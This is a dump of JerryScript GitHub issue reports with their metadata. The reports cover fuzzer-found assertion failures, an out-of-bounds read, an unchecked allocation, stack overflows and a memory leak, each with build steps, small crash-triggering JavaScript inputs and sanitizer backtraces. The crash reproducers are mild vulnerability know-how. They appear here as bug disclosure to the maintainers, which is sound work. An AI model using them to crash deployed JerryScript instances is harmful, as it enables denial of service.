<sup>Found by [Fuzzinator](http://fuzzinator.readthedocs.io/) with [grammarinator](https://github.com/renatahodovan/grammarinator).</sup> | Assertion !(scanner_context.active_literal_pool_p->status_flags & SCANNER_LITERAL_POOL_IN_EXPORT) in scanner_scan_all | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4265/comments | 0 | 2020-10-01T20:46:16Z | 2020-11-30T09:50:14Z | https://github.com/jerryscript-project/jerryscript/issues/4265 | 713,172,353 | 4,265 |
[
"jerryscript-project",
"jerryscript"
]
| I spend some time trying to understand how to use `jerry-generate` to generate bycode for functions and not scripts
(jerry_generate_function_snapshot vs jerry_generate_snapshot)
the jerry-generate --help is not really helpful:
```
./jerry-snapshot --help jerryscript/git/master !
./jerry-snapshot [-h] [COMMAND]
-h, --help print this help and exit
COMMAND specify the command
Available commands:
generate
litdump
merge
Passing -h or --help after a command displays its help.
```
To figure I need to use:
`./jerry-snapshot generate ./function.js -f _function`
I think the `-f` option is explained nowhere in the doc, I figured it from the code.
###### JerryScript revision
master: 0ffe1665
| jerry-script snapshot documentation doesn't explain how to generate snapshot for function (-f) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4263/comments | 2 | 2020-10-01T14:45:01Z | 2020-10-01T14:51:48Z | https://github.com/jerryscript-project/jerryscript/issues/4263 | 712,912,712 | 4,263 |
[
"jerryscript-project",
"jerryscript"
]
| An uncontrolled memory allocation issue was discovered in jerry_port_read_source function in the default-module.c file.
###### JerryScript revision
4b2dbd5c2165f60e770e400d56c90d23fa224048
(latest master - 2020.09.30.)
###### Build platform
Ubuntu 16.04.1 (Linux 4.15.0-117-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on
```
###### Test case
any directory, e.g. a directory name "input"
###### Execution steps
```sh
./jerry input
```
###### Output
```sh
==78885==ERROR: AddressSanitizer failed to allocate 0x80002000 (-2147475456) bytes of LargeMmapAllocator (errno: 12)
==78885==Process memory map follows:
0x08048000-0x08219000 /home/lily/Desktop/debugger/jerryscript/build/bin/jerry
0x08219000-0x0821a000 /home/lily/Desktop/debugger/jerryscript/build/bin/jerry
0x0821a000-0x08237000 /home/lily/Desktop/debugger/jerryscript/build/bin/jerry
0x08237000-0x08238000
0x1ffff000-0x24000000
0x24000000-0x28000000
0x28000000-0x40000000
0xf5c00000-0xf5d00000
0xf5e00000-0xf5f00000
0xf6000000-0xf6100000
0xf6200000-0xf6300000
0xf6400000-0xf6500000
0xf65ad000-0xf776f000
0xf776f000-0xf778a000 /usr/lib32/libgcc_s.so.1
0xf778a000-0xf778b000 /usr/lib32/libgcc_s.so.1
0xf778b000-0xf778c000 /usr/lib32/libgcc_s.so.1
0xf778c000-0xf77df000 /lib32/libm-2.23.so
0xf77df000-0xf77e0000 /lib32/libm-2.23.so
0xf77e0000-0xf77e1000 /lib32/libm-2.23.so
0xf77e1000-0xf77e2000
```
###### Expected behavior
Please check whether an input is a directory or a file. When the input is a directory, jerry_port_get_file_size function will return the file_size 0xffffffff. Or, add a limitation check before malloc in jerry_port_read_source function.
| Uncontrolled memory allocation in jerry_port_read_source function | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4251/comments | 0 | 2020-09-30T23:27:04Z | 2020-10-22T07:05:52Z | https://github.com/jerryscript-project/jerryscript/issues/4251 | 712,347,254 | 4,251 |
[
"jerryscript-project",
"jerryscript"
]
| On line 180 of the main-utils.c,
` do
{
ch = source_p[pos++];
jerry_port_log (JERRY_LOG_LEVEL_ERROR, "%c", ch);
}
while (ch != '\n' && char_count++ < SYNTAX_ERROR_MAX_LINE_LENGTH);`
will out-of-bound read at most 0x100 characters when an syntax error happened at the end of the input file.
##### JerryScript revision
0ffe1665bd0ee457dd4c1083811e1592a5e2908d
(latest master - 2020.09.28.)
###### Build platform
Ubuntu 16.04.1 (Linux 4.15.0-117-generic x86_64)
###### Build steps
1. Compile with Address Sanitizer
```sh
python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on
```
2. Compile without Address Sanitizer
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on
```
###### Test case
```sh
//debugger.js
try {
}
```
###### Execution steps
```sh
./jerry debugger.js
```
###### Output
1. Compile with Address Sanitizer
```sh
==46414==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf640077b at pc 0x0804ac7c bp 0xffb3af18 sp 0xffb3af08
READ of size 1 at 0xf640077b thread T0
#0 0x804ac66 in main_print_unhandled_exception /home/lily/Desktop/debugger/jerryscript/jerry-main/main-utils.c:196
#1 0x80498fc in main /home/lily/Desktop/debugger/jerryscript/jerry-main/main-unix.c:142
#2 0xf782b646 in __libc_start_main (/lib32/libc.so.6+0x18646)
#3 0x8049320 (/home/lily/Desktop/debugger/jerryscript/build/bin/jerry+0x8049320)
0xf640077b is located 0 bytes to the right of 27-byte region [0xf6400760,0xf640077b)
allocated by thread T0 here:
#0 0xf7a5ddee in malloc (/usr/lib32/libasan.so.2+0x96dee)
#1 0x819498a in jerry_port_read_source /home/lily/Desktop/debugger/jerryscript/jerry-port/default/default-module.c:58
#2 0x804aaa7 in main_print_unhandled_exception /home/lily/Desktop/debugger/jerryscript/jerry-main/main-utils.c:164
#3 0x80498fc in main /home/lily/Desktop/debugger/jerryscript/jerry-main/main-unix.c:142
#4 0xf782b646 in __libc_start_main (/lib32/libc.so.6+0x18646)
```
2. Compile without Address Sanitizer
```sh
��'��x�^ �0�Catch or finally block expected.Y��^ �'��SyntaxE($�^ xx
^
SyntaxError: Catch or finally block expected. [debugger.js:4:1]
```
###### Expected behavior
On line 166 of the main-utils.c
` /* 2. seek and print */
while (pos < source_size && curr_line < err_line)
{
if (source_p[pos] == '\n')
{
curr_line++;
}
pos++;
}`
Please consider that the error line may be larger than the test case line number. The above "try" test case has just three lines, but the error happened on line 4 (a "catch" block is needed. ) The **jerry_port_read_source (path_str_p, &source_size)** called in the **main_print_unhandled_exception** need to malloc more memory to locate an error happened out of the source_size; meanwhile, the read operation on line 180 also need to be limited by the extended error location range instead of . | Out-of-bound read in main_print_unhandled_exception | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4244/comments | 4 | 2020-09-29T00:45:00Z | 2021-01-03T11:43:42Z | https://github.com/jerryscript-project/jerryscript/issues/4244 | 710,666,807 | 4,244 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
f58f1507
###### Build platform
Ubuntu 20.04.1 LTS (Linux 5.4.0-48-generic x86_64)
###### Build steps
```sh
mkdir build && cd build && cmake -DCMAKE_BUILD_TYPE=Debug .. && make -j8
```
###### Test case
```javascript
// test.js
h = {}
p = new Proxy({}, h)
h.__proto__ = p;
try { p._ } catch {}
```
###### Execution steps
```sh
./bin/jerry test.js
```
###### Output
Abort (with regular build) without outputs.
###### Backtrace
```
#0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff73a5859 in __GI_abort () at abort.c:79
#2 0x00005555556fe304 in jerry_port_fatal (code=ERR_REF_COUNT_LIMIT) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-port/default/default-fatal.c:30
#3 0x000055555562d2a0 in jerry_fatal (code=ERR_REF_COUNT_LIMIT) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/jrt/jrt-fatals.c:63
#4 0x00005555555ac8e2 in ecma_ref_object (object_p=0x5555557a92e8 <jerry_global_heap+360>) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/base/ecma-gc.c:138
#5 0x00005555555c531e in ecma_copy_value (value=0x16b) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/base/ecma-helpers-value.c:913
#6 0x00005555555f6c2e in ecma_op_to_object (value=0x16b) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-conversion.c:545
#7 0x000055555560aae8 in ecma_op_get_method (value=0x16b, prop_name_p=0x2ad) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:894
#8 0x000055555560ac1c in ecma_op_get_method_by_magic_id (value=0x16b, magic_id=LIT_MAGIC_STRING_GET)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:967
#9 0x0000555555614790 in ecma_validate_proxy_object (handler=0x16b, magic_id=LIT_MAGIC_STRING_GET)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-proxy-object.c:277
#10 0x0000555555616a41 in ecma_proxy_object_get (obj_p=0x5555557a9318 <jerry_global_heap+408>, prop_name_p=0x2ad, receiver=0x16b)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-proxy-object.c:1128
#11 0x000055555560a688 in ecma_op_object_get_with_receiver (object_p=0x5555557a9318 <jerry_global_heap+408>, property_name_p=0x2ad, receiver=0x16b)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:751
#12 0x000055555560ab41 in ecma_op_object_get (property_name_p=0x2ad, object_p=0x5555557a92e8 <jerry_global_heap+360>)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:724
#13 ecma_op_get_method (value=0x16b, prop_name_p=0x2ad) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:904
#14 0x000055555560ac1c in ecma_op_get_method_by_magic_id (value=0x16b, magic_id=LIT_MAGIC_STRING_GET)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:967
#15 0x0000555555614790 in ecma_validate_proxy_object (handler=0x16b, magic_id=LIT_MAGIC_STRING_GET)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-proxy-object.c:277
#16 0x0000555555616a41 in ecma_proxy_object_get (obj_p=0x5555557a9318 <jerry_global_heap+408>, prop_name_p=0x2ad, receiver=0x16b)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-proxy-object.c:1128
#17 0x000055555560a688 in ecma_op_object_get_with_receiver (object_p=0x5555557a9318 <jerry_global_heap+408>, property_name_p=0x2ad, receiver=0x16b)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:751
#18 0x000055555560ab41 in ecma_op_object_get (property_name_p=0x2ad, object_p=0x5555557a92e8 <jerry_global_heap+360>)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:724
#19 ecma_op_get_method (value=0x16b, prop_name_p=0x2ad) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:904
#20 0x000055555560ac1c in ecma_op_get_method_by_magic_id (value=0x16b, magic_id=LIT_MAGIC_STRING_GET)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:967
#21 0x0000555555614790 in ecma_validate_proxy_object (handler=0x16b, magic_id=LIT_MAGIC_STRING_GET)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-proxy-object.c:277
#22 0x0000555555616a41 in ecma_proxy_object_get (obj_p=0x5555557a9318 <jerry_global_heap+408>, prop_name_p=0x2ad, receiver=0x16b)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-proxy-object.c:1128
#23 0x000055555560a688 in ecma_op_object_get_with_receiver (object_p=0x5555557a9318 <jerry_global_heap+408>, property_name_p=0x2ad, receiver=0x16b)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:751
#24 0x000055555560ab41 in ecma_op_object_get (property_name_p=0x2ad, object_p=0x5555557a92e8 <jerry_global_heap+360>)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:724
#25 ecma_op_get_method (value=0x16b, prop_name_p=0x2ad) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:904
#26 0x000055555560ac1c in ecma_op_get_method_by_magic_id (value=0x16b, magic_id=LIT_MAGIC_STRING_GET)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:967
#27 0x0000555555614790 in ecma_validate_proxy_object (handler=0x16b, magic_id=LIT_MAGIC_STRING_GET)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-proxy-object.c:277
#28 0x0000555555616a41 in ecma_proxy_object_get (obj_p=0x5555557a9318 <jerry_global_heap+408>, prop_name_p=0x2ad, receiver=0x16b)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-proxy-object.c:1128
#29 0x000055555560a688 in ecma_op_object_get_with_receiver (object_p=0x5555557a9318 <jerry_global_heap+408>, property_name_p=0x2ad, receiver=0x16b)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:751
#30 0x000055555560ab41 in ecma_op_object_get (property_name_p=0x2ad, object_p=0x5555557a92e8 <jerry_global_heap+360>)
at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:724
#31 ecma_op_get_method (value=0x16b, prop_name_p=0x2ad) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-objects.c:904
```
###### Expected behavior
No errors. | Stack-overflow at ecma-proxy-object.c:277 (ecma_proxy_object_get) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4243/comments | 2 | 2020-09-28T03:32:16Z | 2020-09-28T07:41:22Z | https://github.com/jerryscript-project/jerryscript/issues/4243 | 709,902,351 | 4,243 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
f58f1507
###### Build platform
Ubuntu 20.04.1 LTS (Linux 5.4.0-48-generic x86_64)
###### Build steps
```sh
mkdir build && cd build && cmake -DCMAKE_BUILD_TYPE=Debug .. && make -j8
```
###### Test case
```javascript
// test.js
function echo(m) {
try {
print(m);
} catch (e) {
console.log(m);
}
}
function oos() {
oos();
}
try {
try {
oos();
} finally {
try {
oos();
} catch (e) {
echo("caught: " + e);
} finally {
}
}
} catch (e) {
if (e) {
echo("pass");
}
}
```
###### Execution steps
```sh
./bin/jerry test.js
```
###### Output
Abort without outputs.
###### Backtrace
```
......
#5111 0x00005555555fc813 in ecma_op_function_call_simple (func_obj_p=0x5555557a92d8 <jerry_global_heap+344>, this_arg_value=0x48, arguments_list_p=0x7fffffffb9cc, arguments_list_len=0x0) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-function-object.c:979
#5112 0x00005555555fd1d6 in ecma_op_function_call (func_obj_p=0x5555557a92d8 <jerry_global_heap+344>, this_arg_value=0x48, arguments_list_p=0x7fffffffb9cc, arguments_list_len=0x0) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-function-object.c:1181
#5113 0x000055555566d2c4 in opfunc_call (frame_ctx_p=0x7fffffffb980) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/vm/vm.c:803
#5114 0x0000555555683d44 in vm_execute (frame_ctx_p=0x7fffffffb980) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/vm/vm.c:4882
#5115 0x0000555555684359 in vm_run (shared_p=0x7fffffffbb40, this_binding_value=0x1b, lex_env_p=0x5555557a91b0 <jerry_global_heap+48>) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/vm/vm.c:4983
#5116 0x00005555555fc813 in ecma_op_function_call_simple (func_obj_p=0x5555557a92d8 <jerry_global_heap+344>, this_arg_value=0x48, arguments_list_p=0x7fffffffbd38, arguments_list_len=0x0) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-function-object.c:979
#5117 0x00005555555fd1d6 in ecma_op_function_call (func_obj_p=0x5555557a92d8 <jerry_global_heap+344>, this_arg_value=0x48, arguments_list_p=0x7fffffffbd38, arguments_list_len=0x0) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/ecma/operations/ecma-function-object.c:1181
#5118 0x000055555566d2c4 in opfunc_call (frame_ctx_p=0x7fffffffbce0) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/vm/vm.c:803
#5119 0x0000555555683d44 in vm_execute (frame_ctx_p=0x7fffffffbce0) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/vm/vm.c:4882
#5120 0x0000555555684359 in vm_run (shared_p=0x7fffffffbe70, this_binding_value=0x1b, lex_env_p=0x5555557a91b0 <jerry_global_heap+48>) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/vm/vm.c:4983
#5121 0x000055555566b977 in vm_run_global (bytecode_p=0x5555557a9590 <jerry_global_heap+1040>) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/vm/vm.c:339
#5122 0x00005555555a380b in jerry_run (func_val=0x12b) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-core/api/jerry.c:593
#5123 0x000055555559dbf6 in main (argc=0x2, argv=0x7fffffffc4d8) at /home/hongxu/work/jerryscript/jerryscript-asan/jerry-main/main-unix.c:123
```
###### Expected behavior
Jerryscript does not check the limit of the call stack. I think It should report some error messages like `jsc` or `node`:
```
caught: RangeError: Maximum call stack size exceeded.
pass
``` | Stack-overflow inside function vm_run | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4242/comments | 2 | 2020-09-28T02:40:39Z | 2020-09-28T08:09:05Z | https://github.com/jerryscript-project/jerryscript/issues/4242 | 709,886,420 | 4,242 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
f58f15077f4ca975285025e484cbff58fc061ab4
(latest master - 2020.09.25.)
update: still valid on 68b47f5f300453b0d22a0c28a4e8f30e462d424b (latest master - 2020.12.30.)
###### Build platform
Windows 10 (x86 32 bit jerry.exe)
###### Build steps
./tools/build.py --clean --debug --logging=on --error-messages=on
###### Test cases
- tests\jerry\es.next\class-fields1.js
- tests\jerry\es.next\class-fields3.js
- tests\jerry\es.next\class-fields4.js
- tests\jerry\es.next\class-fields5.js
##### Output
```
Run-Time Check Failure #4 - Stack area around _alloca memory reserved by this function is corrupted
Address: 0x006FF0B0
Size: 48
Allocation number within this function: 1
Data: <T�o> 54 F1 6F 00 1C 45 0C 01 1C 45 0C 01 DC F0 6F 00
```
backtrace:
```
jerry.exe!vm_run(vm_frame_ctx_shared_t * shared_p, unsigned int this_binding_value, ecma_object_t * lex_env_p) Line 4984 C
jerry.exe!opfunc_init_static_class_fields(unsigned int function_object, unsigned int this_val) Line 1054 C
jerry.exe!vm_loop(vm_frame_ctx_t * frame_ctx_p) Line 2102 C
jerry.exe!vm_execute(vm_frame_ctx_t * frame_ctx_p) Line 4876 C
jerry.exe!vm_run(vm_frame_ctx_shared_t * shared_p, unsigned int this_binding_value, ecma_object_t * lex_env_p) Line 4983 C
jerry.exe!vm_run_global(const ecma_compiled_code_t * bytecode_p) Line 339 C
jerry.exe!jerry_run(const unsigned int func_val) Line 593 C
jerry.exe!main(int argc, char * * argv) Line 123 C
[External Code]
[Frames below may be incorrect and/or missing, no symbols loaded for kernel32.dll]
```
###### Expected behavior
no stack corruption | Stack corruption on Windows related to static class fields | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4241/comments | 1 | 2020-09-27T19:42:28Z | 2021-01-08T13:08:56Z | https://github.com/jerryscript-project/jerryscript/issues/4241 | 709,803,038 | 4,241 |
[
"jerryscript-project",
"jerryscript"
]
| Date interface works fine on ubuntu, but not on windows platform
# on ubuntu
```
jerry> var a = new Date()
undefined
jerry> a
Sun Sep 27 2020 11:08:36 GMT+0800
```
# windows platform
```
jerry> var a = new Date()
undefined
jerry> a
Sun Sep 27 2020 03:10:05 GMT+00:00
jerry>
``` | Date interface returns date without timezone offset on windows platform | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4240/comments | 6 | 2020-09-27T03:21:17Z | 2021-01-13T10:39:17Z | https://github.com/jerryscript-project/jerryscript/issues/4240 | 709,657,249 | 4,240 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
629a0e51
###### Build platform
Linux-5.4.0-42-generic-x86_64-with-glibc2.29
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g \
--strip=off --system-allocator=on --logging=on \
--linker-flag=-fuse-ld=gold --error-messages=on --profile=es2015-subset \
--builddir=build --stack-limit=16 \
```
###### Test case
```javascript
class $ {
constructor() {
function $() {}
}
```
###### Output
```text
ICE: Assertion 'context_p->last_cbc_opcode == PARSER_CBC_UNAVAILABLE' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_save_context):2411.
Error: ERR_FAILED_INTERNAL_ASSERTION
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2678543==ERROR: AddressSanitizer: ABRT on unknown address 0x0028df0f (pc 0xf7eeeb49 bp 0xffe8845c sp 0xffe88440 T0)
#0 0xf7eeeb48 (linux-gate.so.1+0xb48)
#1 0xf76e14c5 in raise (/lib/i386-linux-gnu/libc.so.6+0x354c5)
#2 0xf76c93f6 in abort (/lib/i386-linux-gnu/libc.so.6+0x1d3f6)
#3 0x566ea077 in jerry_port_fatal jerryscript/jerry-port/default/default-fatal.c:30
#4 0x56604c25 in jerry_fatal jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x56604c66 in jerry_assert_fail jerryscript/jerry-core/jrt/jrt-fatals.c:87
#6 0x56614ec5 in parser_save_context jerryscript/jerry-core/parser/js/js-parser.c:2411
#7 0x566168f8 in parser_parse_function jerryscript/jerry-core/parser/js/js-parser.c:2544
#8 0x566d3890 in parser_parse_function_statement jerryscript/jerry-core/parser/js/js-parser-statm.c:798
#9 0x566de723 in parser_parse_statements jerryscript/jerry-core/parser/js/js-parser-statm.c:2932
#10 0x56616c3b in parser_parse_function jerryscript/jerry-core/parser/js/js-parser.c:2615
#11 0x566bc7c0 in parser_parse_class_literal jerryscript/jerry-core/parser/js/js-parser-expr.c:597
#12 0x566be747 in parser_parse_class jerryscript/jerry-core/parser/js/js-parser-expr.c:1002
#13 0x566de6ea in parser_parse_statements jerryscript/jerry-core/parser/js/js-parser-statm.c:2911
#14 0x5661429a in parser_parse_source jerryscript/jerry-core/parser/js/js-parser.c:2317
#15 0x56618988 in parser_parse_script jerryscript/jerry-core/parser/js/js-parser.c:3099
#16 0x56577c57 in jerry_parse jerryscript/jerry-core/api/jerry.c:451
#17 0x56571881 in main jerryscript/jerry-main/main-unix.c:112
#18 0xf76caee4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1eee4)
#19 0x56571144 in _start (jerryscript/build/bin/jerry+0x1b144)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: ABRT (linux-gate.so.1+0xb48)
==2678543==ABORTING
```
<sup>Found by [Fuzzinator](http://fuzzinator.readthedocs.io/) with [grammarinator](https://github.com/renatahodovan/grammarinator).</sup> | Assertion context_p->last_cbc_opcode == PARSER_CBC_UNAVAILABLE in parser_save_context | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4238/comments | 0 | 2020-09-25T13:46:15Z | 2020-12-15T10:13:33Z | https://github.com/jerryscript-project/jerryscript/issues/4238 | 708,952,090 | 4,238 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
629a0e51
###### Build platform
Linux-5.4.0-42-generic-x86_64-with-glibc2.29
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g \
--strip=off --system-allocator=on --logging=on \
--linker-flag=-fuse-ld=gold --error-messages=on --profile=es2015-subset \
--builddir=build --stack-limit=16
```
###### Test case
```javascript
class C {
[fxy]() {}
static String["a"](
```
###### Output
```text
ICE: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1787.
Error: ERR_FAILED_INTERNAL_ASSERTION
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1624862==ERROR: AddressSanitizer: ABRT on unknown address 0x0018cb1e (pc 0xf7f60b49 bp 0xffd3469c sp 0xffd34680 T0)
#0 0xf7f60b48 (linux-gate.so.1+0xb48)
#1 0xf77534c5 in raise (/lib/i386-linux-gnu/libc.so.6+0x354c5)
#2 0xf773b3f6 in abort (/lib/i386-linux-gnu/libc.so.6+0x1d3f6)
#3 0x56786077 in jerry_port_fatal jerryscript/jerry-port/default/default-fatal.c:30
#4 0x566a0c25 in jerry_fatal jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x566a0c66 in jerry_assert_fail jerryscript/jerry-core/jrt/jrt-fatals.c:87
#6 0x566ad345 in parser_parse_function_arguments jerryscript/jerry-core/parser/js/js-parser.c:1787
#7 0x566b29ef in parser_parse_function jerryscript/jerry-core/parser/js/js-parser.c:2579
#8 0x56751748 in lexer_construct_function_object jerryscript/jerry-core/parser/js/js-lexer.c:2849
#9 0x56759ce6 in parser_parse_class_literal jerryscript/jerry-core/parser/js/js-parser-expr.c:868
#10 0x5675a747 in parser_parse_class jerryscript/jerry-core/parser/js/js-parser-expr.c:1002
#11 0x5677a6ea in parser_parse_statements jerryscript/jerry-core/parser/js/js-parser-statm.c:2911
#12 0x566b029a in parser_parse_source jerryscript/jerry-core/parser/js/js-parser.c:2317
#13 0x566b4988 in parser_parse_script jerryscript/jerry-core/parser/js/js-parser.c:3099
#14 0x56613c57 in jerry_parse jerryscript/jerry-core/api/jerry.c:451
#15 0x5660d881 in main jerryscript/jerry-main/main-unix.c:112
#16 0xf773cee4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1eee4)
#17 0x5660d144 in _start (jerryscript/build/bin/jerry+0x1b144)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: ABRT (linux-gate.so.1+0xb48)
==1624862==ABORTING
```
<sup>Found by [Fuzzinator](http://fuzzinator.readthedocs.io/) with [grammarinator](https://github.com/renatahodovan/grammarinator).</sup> | Assertion context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION in parser_parse_function_arguments | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4237/comments | 2 | 2020-09-25T13:43:17Z | 2020-10-19T07:51:16Z | https://github.com/jerryscript-project/jerryscript/issues/4237 | 708,949,363 | 4,237 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
3b7409f3a7311430bb4e5e1f065e386b0db71d9a
(latest master - 2020.09.24.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
./tools/build.py --clean --debug --logging=on --error-messages=on
###### Test cases
1 < Symbol(1)
Symbol(1) < 1
1n < Symbol(1)
Symbol(1) < 1n
##### Output
```
ICE: Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):107.
ICE: Assertion 'ECMA_EXTENDED_PRIMITIVE_IS_REF_EQUALS_TO_ONE (bigint_p)' failed at /home/oszi/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_bigint_list):132.
```
###### Expected behavior
no mem leak
The bug is in ecma_op_abstract_relational_compare. There are many early returns when calling ecma_op_to_number to Symbol.
In these cases allocated objects should be freed. Fix is coming. | Memory leak in ecma_op_abstract_relational_compare | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4234/comments | 0 | 2020-09-25T07:44:39Z | 2020-09-28T08:29:26Z | https://github.com/jerryscript-project/jerryscript/issues/4234 | 708,722,905 | 4,234 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
3c723c9bc1aec08a54bc44bba7987e4324f440e4
(latest master - 2020.09.21.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
found by test262-esnext tests:
- Many (48) language/module-code/top-level-await tests
eg:
- language/module-code/top-level-await/syntax/export-class-decl-await-expr-array-literal.js
- language/module-code/top-level-await/syntax/export-class-decl-await-expr-func-expression.js
- ...
###### Output
```
ICE: Assertion 'jmem_is_heap_pointer (pointer_p)' failed at /home/oszi/jerryscript/jerry-core/jmem/jmem-allocator.c(jmem_compress_pointer):182.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Expected behavior
not assert
similar issue : #4215 | Assertion 'jmem_is_heap_pointer (pointer_p)' in jmem_compress_pointer | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4220/comments | 3 | 2020-09-23T12:17:02Z | 2021-01-08T12:10:04Z | https://github.com/jerryscript-project/jerryscript/issues/4220 | 707,310,707 | 4,220 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
3c723c9bc1aec08a54bc44bba7987e4324f440e4
(latest master - 2020.09.21.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
found by test262-esnext tests:
- built-ins/TypedArray/prototype/reduce/BigInt/*
eg:
- built-ins/TypedArray/prototype/reduce/BigInt/callbackfn-arguments-custom-accumulator.js
